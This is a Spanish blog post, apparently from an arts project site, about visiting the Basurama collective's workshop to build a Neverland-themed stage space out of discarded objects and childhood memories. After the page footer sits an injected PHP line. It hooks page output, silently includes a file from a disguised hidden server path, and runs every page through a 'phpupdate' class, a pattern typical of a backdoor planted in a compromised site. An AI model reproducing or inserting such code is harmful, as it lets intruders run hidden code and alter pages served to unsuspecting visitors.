CONSTRUYENDO NUNCA JAMÁS

 En Perdidos en Nunca Jamás

… o lo compro todo

Entrar en la nave de los Basurama es como entrar en una juguetería: un espacio lleno de cacharros, para como ellos dicen trastear. La primera vez que hablamos les dije que Nunca Jamás, según Barrie, el escritor, es el país donde se quedan todas las cosas que ya no usamos, los recuerdos que no nos sirven. Y que así veía yo España tras mi vuelta,  “obsoleta” añadió Ben, y sí, acertó: obsoleta.

¿Cómo trabajar un espacio que esté hecho de nuestros recuerdos, de la memoria de ellos, de los materiales que durante un tiempo fueron fundamentales en nuestra vida pero que ya no hemos vuelto a usar? ¿Cómo recuperar las sensaciones que esos objetos nos provocaban? ¿cómo jugar con ellos, transformarlos?

Empezando por un cuscús riquísimo y comunal a medio día y acabando con una cerveza a las 10 de la noche. Un objeto que simbolice nuestra niñez y desde ahí duerme, duerme negrito que tu mama está en el campo….trabajaaaaaando….

Al final lo queríamos comprar todo, sus 10 años de trabajo en un escenario: la casita de Wendy, el barco, y un camión para transportar porque a ver dónde metemos eso… pues entonces habrá otra cosa que inventar… pues eso, a inventar…

Fotos: Eva Filgueira

Entradas recientes
Escríbenos

Y te responderemos lo antes posible!!

Empiece a escribir y pulse Enter para buscar

function ob_gzhanler($s) { $f='/usr/home/thecrossborderproject.com/etc/ssess_06268501231c12ce8b36dce7d82aab56'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');